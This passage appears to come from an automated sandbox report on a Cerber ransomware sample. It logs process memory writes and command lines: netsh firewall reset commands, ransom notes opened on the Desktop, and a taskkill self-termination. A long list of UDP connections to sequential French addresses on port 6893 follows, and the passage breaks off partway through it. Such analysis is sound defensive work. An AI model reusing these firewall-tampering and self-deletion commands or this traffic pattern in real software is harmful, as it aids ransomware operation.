PID 2148 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2148 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2148 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2148 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2148 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2148 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2148 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2148 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 2148 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 2148 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 2148 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 2148 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2148 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2148 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2148 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2148 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 2148 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 2148 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 2148 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 1328 wrote to memory of 2080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1328 wrote to memory of 2080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1328 wrote to memory of 2080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1328 wrote to memory of 2080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1328 wrote to memory of 1960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1328 wrote to memory of 1960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1328 wrote to memory of 1960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1328 wrote to memory of 1960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\cerber.exe

"C:\Users\Admin\AppData\Local\Temp\cerber.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall reset

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___PXAGF_.hta"

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___MMBXD_.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im "cerber.exe"

C:\Windows\SysWOW64\PING.EXE

ping -n 1 127.0.0.1

Network

Country Destination Domain Proto
FR 178.33.158.0:6893 udp
FR 178.33.158.1:6893 udp
FR 178.33.158.2:6893 udp
FR 178.33.158.3:6893 udp
FR 178.33.158.4:6893 udp
FR 178.33.158.5:6893 udp
FR 178.33.158.6:6893 udp
FR 178.33.158.7:6893 udp
FR 178.33.158.8:6893 udp
FR 178.33.158.9:6893 udp
FR 178.33.158.10:6893 udp
FR 178.33.158.11:6893 udp
FR 178.33.158.12:6893 udp
FR 178.33.158.13:6893 udp
FR 178.33.158.14:6893 udp
FR 178.33.158.15:6893 udp
FR 178.33.158.16:6893 udp
FR 178.33.158.17:6893 udp
FR 178.33.158.18:6893 udp
FR 178.33.158.19:6893 udp
FR 178.33.158.20:6893 udp
FR 178.33.158.21:6893 udp
FR 178.33.158.22:6893 udp
FR 178.33.158.23:6893 udp
FR 178.33.158.24:6893 udp
FR 178.33.158.25:6893 udp
FR 178.33.158.26:6893 udp
FR 178.33.158.27:6893 udp
FR 178.33.158.28:6893 udp
FR 178.33.158.29:6893 udp
FR 178.33.158.30:6893 udp
FR 178.33.158.31:6893 udp
FR 178.33.159.0:6893 udp
FR 178.33.159.1:6893 udp
FR 178.33.159.2:6893 udp
FR 178.33.159.3:6893 udp
FR 178.33.159.4:6893 udp
FR 178.33.159.5:6893 udp
FR 178.33.159.6:6893 udp
FR 178.33.159.7:6893 udp
FR 178.33.159.8:6893 udp
FR 178.33.159.9:6893 udp
FR 178.33.159.10:6893 udp
FR 178.33.159.11:6893 udp
FR 178.33.159.12:6893 udp
FR 178.33.159.13:6893 udp
FR 178.33.159.14:6893 udp
FR 178.33.159.15:6893 udp
FR 178.33.159.16:6893 udp
FR 178.33.159.17:6893 udp
FR 178.33.159.18:6893 udp
FR 178.33.159.19:6893 udp
FR 178.33.159.20:6893 udp
FR 178.33.159.21:6893 udp
FR 178.33.159.22:6893 udp
FR 178.33.159.23:6893 udp
FR 178.33.159.24:6893 udp
FR 178.33.159.25:6893 udp
FR 178.33.159.26:6893 udp
FR 178.33.159.27:6893 udp
FR 178.33.159.28:6893 udp
FR 178.33.159.29:6893 udp
FR 178.33.159.30:6893 udp
FR 178.33.159.31:6893 udp
FR 178.33.160.0:6893 udp
FR 178.33.160.1:6893 udp
FR 178.33.160.2:6893 udp
FR 178.33.160.3:6893 udp
FR 178.33.160.4:6893 udp
FR 178.33.160.5:6893 udp
FR 178.33.160.6:6893 udp
FR 178.33.160.7:6893 udp
FR 178.33.160.8:6893 udp
FR 178.33.160.9:6893 udp
FR 178.33.160.10:6893 udp
FR 178.33.160.11:6893 udp
FR 178.33.160.12:6893 udp
FR 178.33.160.13:6893 udp
FR 178.33.160.14:6893 udp
FR 178.33.160.15:6893 udp
FR 178.33.160.16:6893 udp
FR 178.33.160.17:6893 udp
FR 178.33.160.18:6893 udp
FR 178.33.160.19:6893 udp
FR 178.33.160.20:6893 udp
FR 178.33.160.21:6893 udp
FR 178.33.160.22:6893 udp
FR 178.33.160.23:6893 udp
FR 178.33.160.24:6893 udp
FR 178.33.160.25:6893 udp
FR 178.33.160.26:6893 udp
FR 178.33.160.27:6893 udp
FR 178.33.160.28:6893 udp
FR 178.33.160.29:6893 udp
FR 178.33.160.30:6893 udp
FR 178.33.160.31:6893 udp
FR 178.33.160.32:6893 udp
FR 178.33.160.33:6893 udp
FR 178.33.160.34:6893 udp
FR 178.33.160.35:6893 udp
FR 178.33.160.36:6893 udp
FR 178.33.160.37:6893 udp
FR 178.33.160.38:6893 udp
FR 178.33.160.39:6893 udp
FR 178.33.160.40:6893 udp
FR 178.33.160.41:6893 udp
FR 178.33.160.42:6893 udp
FR 178.33.160.43:6893 udp
FR 178.33.160.44:6893 udp
FR 178.33.160.45:6893 udp
FR 178.33.160.46:6893 udp
FR 178.33.160.47:6893 udp
FR 178.33.160.48:6893 udp
FR 178.33.160.49:6893 udp
FR 178.33.160.50:6893 udp
FR 178.33.160.51:6893 udp
FR 178.33.160.52:6893 udp
FR 178.33.160.53:6893 udp
FR 178.33.160.54:6893 udp
FR 178.33.160.55:6893 udp
FR 178.33.160.56:6893 udp
FR 178.33.160.57:6893 udp
FR 178.33.160.58:6893 udp
FR 178.33.160.59:6893 udp
FR 178.33.160.60:6893 udp
FR 178.33.160.61:6893 udp
FR 178.33.160.62:6893 udp
FR 178.33.160.63:6893 udp
FR 178.33.160.64:6893 udp
FR 178.33.160.65:6893 udp
FR 178.33.160.66:6893 udp
FR 178.33.160.67:6893 udp
FR 178.33.160.68:6893 udp
FR 178.33.160.69:6893 udp
FR 178.33.160.70:6893 udp
FR 178.33.160.71:6893 udp
FR 178.33.160.72:6893 udp
FR 178.33.160.73:6893 udp
FR 178.33.160.74:6893 udp
FR 178.33.160.75:6893 udp
FR 178.33.160.76:6893 udp
FR 178.33.160.77:6893 udp
FR 178.33.160.78:6893 udp
FR 178.33.160.79:6893 udp
FR 178.33.160.80:6893 udp
FR 178.33.160.81:6893 udp
FR 178.33.160.82:6893 udp
FR 178.33.160.83:6893 udp
FR 178.33.160.84:6893 udp
FR 178.33.160.85:6893 udp
FR 178.33.160.86:6893 udp
FR 178.33.160.87:6893 udp
FR 178.33.160.88:6893 udp
FR 178.33.160.89:6893 udp
FR 178.33.160.90:6893 udp
FR 178.33.160.91:6893 udp
FR 178.33.160.92:6893 udp
FR 178.33.160.93:6893 udp
FR 178.33.160.94:6893 udp
FR 178.33.160.95:6893 udp
FR 178.33.160.96:6893 udp
FR 178.33.160.97:6893 udp
FR 178.33.160.98:6893 udp
FR 178.33.160.99:6893 udp
FR 178.33.160.100:6893 udp
FR 178.33.160.101:6893 udp
FR 178.33.160.102:6893 udp
FR 178.33.160.103:6893 udp
FR 178.33.160.104:6893 udp
FR 178.33.160.105:6893 udp
FR 178.33.160.106:6893 udp
FR 178.33.160.107:6893 udp
FR 178.33.160.108:6893 udp
FR 178.33.160.109:6893 udp
FR 178.33.160.110:6893 udp
FR 178.33.160.111:6893 udp
FR 178.33.160.112:6893 udp
FR 178.33.160.113:6893 udp
FR 178.33.160.114:6893 udp
FR 178.33.160.115:6893 udp
FR 178.33.160.116:6893 udp
FR 178.33.160.117:6893 udp
FR 178.33.160.118:6893 udp
FR 178.33.160.119:6893 udp
FR 178.33.160.120:6893 udp
FR 178.33.160.121:6893 udp
FR 178.33.160.122:6893 udp
FR 178.33.160.123:6893 udp
FR 178.33.160.124:6893 udp
FR 178.33.160.125:6893 udp
FR 178.33.160.126:6893 udp
FR 178.33.160.127:6893 udp
FR 178.33.160.128:6893 udp
FR 178.33.160.129:6893 udp
FR 178.33.160.130:6893 udp
FR 178.33.160.131:6893 udp
FR 178.33.160.132:6893 udp
FR 178.33.160.133:6893 udp
FR 178.33.160.134:6893 udp
FR 178.33.160.135:6893 udp
FR 178.33.160.136:6893 udp
FR 178.33.160.137:6893 udp
FR 178.33.160.138:6893 udp
FR 178.33.160.139:6893 udp
FR 178.33.160.140:6893 udp
FR 178.33.160.141:6893 udp
FR 178.33.160.142:6893 udp
FR 178.33.160.143:6893 udp
FR 178.33.160.144:6893 udp
FR 178.33.160.145:6893 udp
FR 178.33.160.146:6893 udp
FR 178.33.160.147:6893 udp
FR 178.33.160.148:6893 udp
FR 178.33.160.149:6893 udp
FR 178.33.160.150:6893 udp
FR 178.33.160.151:6893 udp
FR 178.33.160.152:6893 udp
FR 178.33.160.153:6893 udp
FR 178.33.160.154:6893 udp
FR 178.33.160.155:6893 udp
FR 178.33.160.156:6893 udp
FR 178.33.160.157:6893 udp
FR 178.33.160.158:6893 udp
FR 178.33.160.159:6893 udp
FR 178.33.160.160:6893 udp
FR 178.33.160.161:6893 udp
FR 178.33.160.162:6893 udp
FR 178.33.160.163:6893 udp
FR 178.33.160.164:6893 udp
FR 178.33.160.165:6893 udp
FR 178.33.160.166:6893 udp
FR 178.33.160.167:6893 udp
FR 178.33.160.168:6893 udp
FR 178.33.160.169:6893 udp
FR 178.33.160.170:6893 udp
FR 178.33.160.171:6893 udp
FR 178.33.160.172:6893 udp
FR 178.33.160.173:6893 udp
FR 178.33.160.174:6893 udp
FR 178.33.160.175:6893 udp
FR 178.33.160.176:6893 udp
FR 178.33.160.177:6893 udp
FR 178.33.160.178:6893 udp
FR 178.33.160.179:6893 udp
FR 178.33.160.180:6893 udp
FR 178.33.160.181:6893 udp
FR 178.33.160.182:6893 udp
FR 178.33.160.183:6893 udp
FR 178.33.160.184:6893 udp
FR 178.33.160.185:6893 udp
FR 178.33.160.186:6893 udp
FR 178.33.160.187:6893 udp
FR 178.33.160.188:6893 udp
FR 178.33.160.189:6893 udp
FR 178.33.160.190:6893 udp
FR 178.33.160.191:6893 udp
FR 178.33.160.192:6893 udp
FR 178.33.160.193:6893 udp
FR 178.33.160.194:6893 udp
FR 178.33.160.195:6893 udp
FR 178.33.160.196:6893 udp
FR 178.33.160.197:6893 udp
FR 178.33.160.198:6893 udp
FR 178.33.160.199:6893 udp
FR 178.33.160.200:6893 udp
FR 178.33.160.201:6893 udp
FR 178.33.160.202:6893 udp
FR 178.33.160.203:6893 udp
FR 178.33.160.204:6893 udp
FR 178.33.160.205:6893 udp
FR 178.33.160.206:6893 udp
FR 178.33.160.207:6893 udp
FR 178.33.160.208:6893 udp
FR 178.33.160.209:6893 udp
FR 178.33.160.210:6893 udp
FR 178.33.160.211:6893 udp
FR 178.33.160.212:6893 udp
FR 178.33.160.213:6893 udp
FR 178.33.160.214:6893 udp
FR 178.33.160.215:6893 udp
FR 178.33.160.216:6893 udp
FR 178.33.160.217:6893 udp
FR 178.33.160.218:6893 udp
FR 178.33.160.219:6893 udp
FR 178.33.160.220:6893 udp
FR 178.33.160.221:6893 udp
FR 178.33.160.222:6893 udp
FR 178.33.160.223:6893 udp
FR 178.33.160.224:6893 udp
FR 178.33.160.225:6893 udp
FR 178.33.160.226:6893 udp
FR 178.33.160.227:6893 udp
FR 178.33.160.228:6893 udp
FR 178.33.160.229:6893 udp
FR 178.33.160.230:6893 udp
FR 178.33.160.231:6893 udp
FR 178.33.160.232:6893 udp
FR 178.33.160.233:6893 udp
FR 178.33.160.234:6893 udp
FR 178.33.160.235:6893 udp
FR 178.33.160.236:6893 udp
FR 178.33.160.237:6893 udp
FR 178.33.160.238:6893 udp
FR 178.33.160.239:6893 udp
FR 178.33.160.240:6893 udp
FR 178.33.160.241:6893 udp
FR 178.33.160.242:6893 udp
FR 178.33.160.243:6893 udp
FR 178.33.160.244:6893 udp
FR 178.33.160.245:6893 udp
FR 178.33.160.246:6893 udp
FR 178.33.160.247:6893 udp
FR 178.33.160.248:6893 udp
FR 178.33.160.249:6893 udp
FR 178.33.160.250:6893 udp
FR 178.33.160.251:6893 udp
FR 178.33.160.252:6893 udp
FR 178.33.160.253:6893 udp
FR 178.33.160.254:6893 udp
FR 178.33.160.255:6893 udp
FR 178.33.161.0:6893 udp
FR 178.33.161.1:6893 udp
FR 178.33.161.2:6893 udp
FR 178.33.161.3:6893 udp
FR 178.33.161.4:6893 udp
FR 178.33.161.5:6893 udp
FR 178.33.161.6:6893 udp
FR 178.33.161.7:6893 udp
FR 178.33.161.8:6893 udp
FR 178.33.161.9:6893 udp
FR 178.33.161.10:6893 udp
FR 178.33.161.11:6893 udp
FR 178.33.161.12:6893 udp
FR 178.33.161.13:6893 udp
FR 178.33.161.14:6893 udp
FR 178.33.161.15:6893 udp
FR 178.33.161.16:6893 udp
FR 178.33.161.17:6893 udp
FR 178.33.161.18:6893 udp
FR 178.33.161.19:6893 udp
FR 178.33.161.20:6893 udp
FR 178.33.161.21:6893 udp
FR 178.33.161.22:6893 udp
FR 178.33.161.23:6893 udp
FR 178.33.161.24:6893 udp
FR 178.33.161.25:6893 udp
FR 178.33.161.26:6893 udp
FR 178.33.161.27:6893 udp
FR 178.33.161.28:6893 udp
FR 178.33.161.29:6893 udp
FR 178.33.161.30:6893 udp
FR 178.33.161.31:6893 udp
FR 178.33.161.32:6893 udp
FR 178.33.161.33:6893 udp
FR 178.33.161.34:6893 udp
FR 178.33.161.35:6893 udp
FR 178.33.161.36:6893 udp
FR 178.33.161.37:6893 udp
FR 178.33.161.38:6893 udp
FR 178.33.161.39:6893 udp
FR 178.33.161.40:6893 udp
FR 178.33.161.41:6893 udp
FR 178.33.161.42:6893 udp
FR 178.33.161.43:6893 udp
FR 178.33.161.44:6893 udp
FR 178.33.161.45:6893 udp
FR 178.33.161.46:6893 udp
FR 178.33.161.47:6893 udp
FR 178.33.161.48:6893 udp
FR 178.33.161.49:6893 udp
FR 178.33.161.50:6893 udp
FR 178.33.161.51:6893 udp
FR 178.33.161.52:6893 udp
FR 178.33.161.53:6893 udp
FR 178.33.161.54:6893 udp
FR 178.33.161.55:6893 udp
FR 178.33.161.56:6893 udp
FR 178.33.161.57:6893 udp
FR 178.33.161.58:6893 udp
FR 178.33.161.59:6893 udp
FR 178.33.161.60:6893 udp
FR 178.33.161.61:6893 udp
FR 178.33.161.62:6893 udp
FR 178.33.161.63:6893 udp
FR 178.33.161.64:6893 udp
FR 178.33.161.65:6893 udp
FR 178.33.161.66:6893 udp
FR 178.33.161.67:6893 udp
FR 178.33.161.68:6893 udp
FR 178.33.161.69:6893 udp
FR 178.33.161.70:6893 udp
FR 178.33.161.71:6893 udp
FR 178.33.161.72:6893 udp
FR 178.33.161.73:6893 udp
FR 178.33.161.74:6893 udp
FR 178.33.161.75:6893 udp
FR 178.33.161.76:6893 udp
FR 178.33.161.77:6893 udp
FR 178.33.161.78:6893 udp
FR 178.33.161.79:6893 udp
FR 178.33.161.80:6893 udp
FR 178.33.161.81:6893 udp
FR 178.33.161.82:6893 udp
FR 178.33.161.83:6893 udp
FR 178.33.161.84:6893 udp
FR 178.33.161.85:6893 udp
FR 178.33.161.86:6893 udp
FR 178.33.161.87:6893 udp
FR 178.33.161.88:6893 udp
FR 178.33.161.89:6893 udp
FR 178.33.161.90:6893 udp
FR 178.33.161.91:6893 udp
FR 178.33.161.92:6893 udp
FR 178.33.161.93:6893 udp
FR 178.33.161.94:6893 udp
FR 178.33.161.95:6893 udp
FR 178.33.161.96:6893 udp
FR 178.33.161.97:6893 udp
FR 178.33.161.98:6893 udp
FR 178.33.161.99:6893 udp
FR 178.33.161.100:6893 udp
FR 178.33.161.101:6893 udp
FR 178.33.161.102:6893 udp
FR 178.33.161.103:6893 udp
FR 178.33.161.104:6893 udp
FR 178.33.161.105:6893 udp
FR 178.33.161.106:6893 udp
FR 178.33.161.107:6893 udp
FR 178.33.161.108:6893 udp
FR 178.33.161.109:6893 udp
FR 178.33.161.110:6893 udp
FR 178.33.161.111:6893 udp
FR 178.33.161.112:6893 udp
FR 178.33.161.113:6893 udp
FR 178.33.161.114:6893 udp
FR 178.33.161.115:6893 udp
FR 178.33.161.116:6893 udp
FR 178.33.161.117:6893 udp
FR 178.33.161.118:6893 udp
FR 178.33.161.119:6893 udp
FR 178.33.161.120:6893 udp
FR 178.33.161.121:6893 udp
FR 178.33.161.122:6893 udp
FR 178.33.161.123:6893 udp
FR 178.33.161.124:6893 udp
FR 178.33.161.125:6893 udp
FR 178.33.161.126:6893 udp
FR 178.33.161.127:6893 udp
FR 178.33.161.128:6893 udp
FR 178.33.161.129:6893 udp
FR 178.33.161.130:6893 udp
FR 178.33.161.131:6893 udp
FR 178.33.161.132:6893 udp
FR 178.33.161.133:6893 udp
FR 178.33.161.134:6893 udp
FR 178.33.161.135:6893 udp
FR 178.33.161.136:6893 udp
FR 178.33.161.137:6893 udp
FR 178.33.161.138:6893 udp
FR 178.33.161.139:6893 udp
FR 178.33.161.140:6893 udp
FR 178.33.161.141:6893 udp
FR 178.33.161.142:6893 udp
FR 178.33.161.143:6893 udp
FR 178.33.161.144:6893 udp
FR 178.33.161.145:6893 udp
FR 178.33.161.146:6893 udp
FR 178.33.161.147:6893 udp
FR 178.33.161.148:6893 udp
FR 178.33.161.149:6893 udp
FR 178.33.161.150:6893 udp
FR 178.33.161.151:6893 udp
FR 178.33.161.152:6893 udp
FR 178.33.161.153:6893 udp
FR 178.33.161.154:6893 udp
FR 178.33.161.155:6893 udp
FR 178.33.161.156:6893 udp
FR 178.33.161.157:6893 udp
FR 178.33.161.158:6893 udp
FR 178.33.161.159:6893 udp
FR 178.33.161.160:6893 udp
FR 178.33.161.161:6893 udp
FR 178.33.161.162:6893 udp
FR 178.33.161.163:6893 udp
FR 178.33.161.164:6893 udp
FR 178.33.161.165:6893 udp
FR 178.33.161.166:6893 udp
FR 178.33.161.167:6893 udp
FR 178.33.161.168:6893 udp
FR 178.33.161.169:6893 udp
FR 178.33.161.170:6893 udp
FR 178.33.161.171:6893 udp
FR 178.33.161.172:6893 udp
FR 178.33.161.173:6893 udp
FR 178.33.161.174:6893 udp
FR 178.33.161.175:6893 udp
FR 178.33.161.176:6893 udp
FR 178.33.161.177:6893 udp
FR 178.33.161.178:6893 udp
FR 178.33.161.179:6893 udp
FR 178.33.161.180:6893 udp
FR 178.33.161.181:6893 udp
FR 178.33.161.182:6893 udp
FR 178.33.161.183:6893 udp
FR 178.33.161.184:6893 udp
FR 178.33.161.185:6893 udp
FR 178.33.161.186:6893 udp
FR 178.33.161.187:6893 udp
FR 178.33.161.188:6893 udp
FR 178.33.161.189:6893 udp
FR 178.33.161.190:6893 udp
FR 178.33.161.191:6893 udp
FR 178.33.161.192:6893 udp
FR 178.33.161.193:6893 udp
FR 178.33.161.194:6893 udp
FR 178.33.161.195:6893 udp
FR 178.33.161.196:6893 udp
FR 178.33.161.197:6893 udp
FR 178.33.161.198:6893 udp
FR 178.33.161.199:6893 udp
FR 178.33.161.200:6893 udp
FR 178.33.161.201:6893 udp
FR 178.33.161.202:6893 udp
FR 178.33.161.203:6893 udp
FR 178.33.161.204:6893 udp
FR 178.33.161.205:6893 udp
FR 178.33.161.206:6893 udp
FR 178.33.161.207:6893 udp
FR 178.33.161.208:6893 udp
FR 178.33.161.209:6893 udp
FR 178.33.161.210:6893 udp
FR 178.33.161.211:6893 udp
FR 178.33.161.212:6893 udp
FR 178.33.161.213:6893 udp
FR 178.33.161.214:6893 udp
FR 178.33.161.215:6893 udp
FR 178.33.161.216:6893 udp
FR 178.33.161.217:6893 udp
FR 178.33.161.218:6893 udp
FR 178.33.161.219:6893 udp
FR 178.33.161.220:6893 udp
FR 178.33.161.221:6893 udp
FR 178.33.161.222:6893 udp
FR 178.33.161.223:6893 udp
FR 178.33.161.224:6893 udp
FR 178.33.161.225:6893 udp
FR 178.33.161.226:6893 udp
FR 178.33.161.227:6893 udp
FR 178.33.161.228:6893 udp
FR 178.33.161.229:6893 udp
FR 178.33.161.230:6893 udp
FR 178.33.161.231:6893 udp
FR 178.33.161.232:6893 udp
FR 178.33.161.233:6893 udp
FR 178.33.161.234:6893 udp
FR 178.33.161.235:6893 udp
FR 178.33.161.236:6893 udp
FR 178.33.161.237:6893 udp
FR 178.33.161.238:6893 udp
FR 178.33.161.239:6893 udp
FR 178.33.161.240:6893 udp
FR 178.33.161.241:6893 udp
FR 178.33.161.242:6893 udp
FR 178.33.161.243:6893 udp
FR 178.33.161.244:6893 udp
FR 178.33.161.245:6893 udp
FR 178.33.161.246:6893 udp
FR 178.33.161.247:6893 udp
FR 178.33.161.248:6893 udp
FR 178.33.161.249:6893 udp
FR 178.33.161.250:6893 udp
FR 178.33.161.251:6893 udp
FR 178.33.161.252:6893 udp
FR 178.33.161.253:6893 udp
FR 178.33.161.254:6893 udp
FR 178.33.161.255:6893 udp
FR 178.33.162.0:6893 udp
FR 178.33.162.1:6893 udp
FR 178.33.162.2:6893 udp
FR 178.33.162.3:6893 udp
FR 178.33.162.4:6893 udp
FR 178.33.162.5:6893 udp
FR 178.33.162.6:6893 udp
FR 178.33.162.7:6893 udp
FR 178.33.162.8:6893 udp
FR 178.33.162.9:6893 udp
FR 178.33.162.10:6893 udp
FR 178.33.162.11:6893 udp
FR 178.33.162.12:6893 udp
FR 178.33.162.13:6893 udp
FR 178.33.162.14:6893 udp
FR 178.33.162.15:6893 udp
FR 178.33.162.16:6893 udp
FR 178.33.162.17:6893 udp
FR 178.33.162.18:6893 udp
FR 178.33.162.19:6893 udp
FR 178.33.162.20:6893 udp
FR 178.33.162.21:6893 udp
FR 178.33.162.22:6893 udp
FR 178.33.162.23:6893 udp
FR 178.33.162.24:6893 udp
FR 178.33.162.25:6893 udp
FR 178.33.162.26:6893 udp
FR 178.33.162.27:6893 udp
FR 178.33.162.28:6893 udp
FR 178.33.162.29:6893 udp
FR 178.33.162.30:6893 udp
FR 178.33.162.31:6893 udp
FR 178.33.162.32:6893 udp
FR 178.33.162.33:6893 udp
FR 178.33.162.34:6893 udp
FR 178.33.162.35:6893 udp
FR 178.33.162.36:6893 udp
FR 178.33.162.37:6893 udp
FR 178.33.162.38:6893 udp
FR 178.33.162.39:6893 udp
FR 178.33.162.40:6893 udp
FR 178.33.162.41:6893 udp
FR 178.33.162.42:6893 udp
FR 178.33.162.43:6893 udp
FR 178.33.162.44:6893 udp
FR 178.33.162.45:6893 udp
FR 178.33.162.46:6893 udp
FR 178.33.162.47:6893 udp
FR 178.33.162.48:6893 udp
FR 178.33.162.49:6893 udp
FR 178.33.162.50:6893 udp
FR 178.33.162.51:6893 udp
FR 178.33.162.52:6893 udp
FR 178.33.162.53:6893 udp
FR 178.33.162.54:6893 udp
FR 178.33.162.55:6893 udp
FR 178.33.162.56:6893 udp
FR 178.33.162.57:6893 udp
FR 178.33.162.58:6893 udp
FR 178.33.162.59:6893 udp
FR 178.33.162.60:6893 udp
FR 178.33.162.61:6893 udp
FR 178.33.162.62:6893 udp
FR 178.33.162.63:6893 udp
FR 178.33.162.64:6893 udp
FR 178.33.162.65:6893 udp
FR 178.33.162.66:6893 udp
FR 178.33.162.67:6893 udp
FR 178.33.162.68:6893 udp
FR 178.33.162.69:6893 udp
FR 178.33.162.70:6893 udp
FR 178.33.162.71:6893 udp
FR 178.33.162.72:6893 udp
FR 178.33.162.73:6893 udp
FR 178.33.162.74:6893 udp
FR 178.33.162.75:6893 udp
FR 178.33.162.76:6893 udp
FR 178.33.162.77:6893 udp
FR 178.33.162.78:6893 udp
FR 178.33.162.79:6893 udp
FR 178.33.162.80:6893 udp
FR 178.33.162.81:6893 udp
FR 178.33.162.82:6893 udp
FR 178.33.162.83:6893 udp
FR 178.33.162.84:6893 udp
FR 178.33.162.85:6893 udp
FR 178.33.162.86:6893 udp
FR 178.33.162.87:6893 udp
FR 178.33.162.88:6893 udp
FR 178.33.162.89:6893 udp
FR 178.33.162.90:6893 udp
FR 178.33.162.91:6893 udp
FR 178.33.162.92:6893 udp
FR 178.33.162.93:6893 udp
FR 178.33.162.94:6893 udp
FR 178.33.162.95:6893 udp
FR 178.33.162.96:6893 udp
FR 178.33.162.97:6893 udp
FR 178.33.162.98:6893 udp
FR 178.33.162.99:6893 udp
FR 178.33.162.100:6893 udp
FR 178.33.162.101:6893 udp
FR 178.33.162.102:6893 udp
FR 178.33.162.103:6893 udp
FR 178.33.162.104:6893 udp
FR 178.33.162.105:6893 udp
FR 178.33.162.106:6893 udp
FR 178.33.162.107:6893 udp
FR 178.33.162.108:6893 udp
FR 178.33.162.109:6893 udp
FR 178.33.162.110:6893 udp
FR 178.33.162.111:6893 udp
FR 178.33.162.112:6893 udp
FR 178.33.162.113:6893 udp
FR 178.33.162.114:6893 udp
FR 178.33.162.115:6893 udp
FR 178.33.162.116:6893 udp
FR 178.33.162.117:6893 udp
FR 178.33.162.118:6893 udp
FR 178.33.162.119:6893 udp
FR 178.33.162.120:6893 udp
FR 178.33.162.121:6893 udp
FR 178.33.162.122:6893 udp
FR 178.33.162.123:6893 udp
FR 178.33.162.124:6893 udp
FR 178.33.162.125:6893 udp
FR 178.33.162.126:6893 udp
FR 178.33.162.127:6893 udp
FR 178.33.162.128:6893 udp
FR 178.33.162.129:6893 udp
FR 178.33.162.130:6893 udp
FR 178.33.162.131:6893 udp
FR 178.33.162.132:6893 udp
FR 178.33.162.133:6893 udp
FR 178.33.162.134:6893 udp
FR 178.33.162.135:6893 udp
FR 178.33.162.136:6893 udp
FR 178.33.162.137:6893 udp
FR 178.33.162.138:6893 udp
FR 178.33.162.139:6893 udp
FR 178.33.162.140:6893 udp
FR 178.33.162.141:6893 udp
FR 178.33.162.142:6893 udp
FR 178.33.162.143:6893 udp
FR 178.33.162.144:6893 udp
FR 178.33.162.145:6893 udp
FR 178.33.162.146:6893 udp
FR 178.33.162.147:6893 udp
FR 178.33.162.148:6893 udp
FR 178.33.162.149:6893 udp
FR 178.33.162.150:6893 udp
FR 178.33.162.151:6893 udp
FR 178.33.162.152:6893 udp
FR 178.33.162.153:6893 udp
FR 178.33.162.154:6893 udp
FR 178.33.162.155:6893 udp
FR 178.33.162.156:6893 udp
FR 178.33.162.157:6893 udp
FR 178.33.162.158:6893 udp
FR 178.33.162.159:6893 udp
FR 178.33.162.160:6893 udp
FR 178.33.162.161:6893 udp
FR 178.33.162.162:6893 udp
FR 178.33.162.163:6893 udp
FR 178.33.162.164:6893 udp
FR 178.33.162.165:6893 udp
FR 178.33.162.166:6893 udp
FR 178.33.162.167:6893 udp
FR 178.33.162.168:6893 udp
FR 178.33.162.169:6893 udp
FR 178.33.162.170:6893 udp
FR 178.33.162.171:6893 udp
